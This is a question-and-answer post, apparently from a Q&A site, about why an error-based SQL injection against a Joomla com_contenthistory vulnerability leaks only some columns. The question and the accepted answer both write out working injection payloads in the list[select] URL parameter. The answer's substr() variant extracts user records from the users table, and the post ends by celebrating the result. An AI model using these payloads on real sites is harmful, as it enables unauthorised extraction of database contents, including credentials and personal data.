# Why does error-based SQL injection works only with certan fields?

Tags: sql-injection, mysql, joomla

I'm currently investigating the latest vulnerability affecting Joomla CMS.

You can find [here a description of the vulnerability](https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/?page=1&year=0&month=0), however my question is merely on error-based SQL injections and is context independent.

- The base URL I use  to access the vulnerability is:

  ```
  https://example.com/index.php?option=com_contenthistory&view=history&list[select]=SQL_INJECTION_HERE
  ```
- The injection I use is in the form:

  ```
  (select col.a Array from (select count(*), concat(0x3a, 0x3a, (select user()), 0x3a, 0x3a, floor(rand()*2)) a from information_schema.columns,  jml_users  group by a) col) ,'A' union select uc.id
  ```

The example above works fine: executing it a few time randomly produces `Subquery returns more than 1 row` and the expected `Duplicate entry '::joomla@localhost::0' for key 'group_key'` error messages leaking the MySQL user used by Joomla :) !

However, I cannot access all the database content. Some fields will always produce the `Subquery returns more than 1 row` and never leak the information they contain.

This limitation is reproducible when connecting directly to a MySQL prompt.

I did not encounter any description of this (quite annoying) limitation in the articles I read on the subject. Is it something known? Is it specific to my MySQL version (5.6.14-enterprise-commercial-advanced)? Is there any workaround?

Answer (score 1, accepted):

Here are which requests work using this injection and which doesn't, associated to their column types:

**What works:**

- Using MySQL internal functions like `users()`, `database()`, etc.
- Using system variables like `@@version`, etc.
- Accessing short sized column contents like these ones all from the `*_users` table: `*id` (*int(11)*), `email` (*varchar(100)*), `password` (*varchar(100)*), `registerdate` (*datetime*), etc.

**What does *not* work:**

- Accessing longer sized columns like (still belonging to the `*_users` table) `name` (*varchar(255)*), `username` (*varchar(150)*), params (*text*), otpKey (*varchar(1000)*), etc.

Here it becomes clear that the thing somehow keeping the error-based SQL injection to work properly is the field size (not matter the content size, the column could be empty).

The solution then becomes crystal clear: add a `substr()` call to the SQL injection and now the whole database content becomes accessible :) !

```
http://example.com//index.php?option=com_contenthistory&view=history&list[select]=(select col.a from (select count(*), concat(0x3a, 0x3a, (select substr(name,1,100) from jml_users limit 0,1), 0x3a, 0x3a, floor(rand()*2)) a from information_schema.columns i1 group by a) col),'A' union select uc.id
```

**500 - Duplicate entry '::Noob::1' for key 'group_key'**

Owned :)! (I do still wonder though if this limitation is a general one or is limited to this version of MySQL server).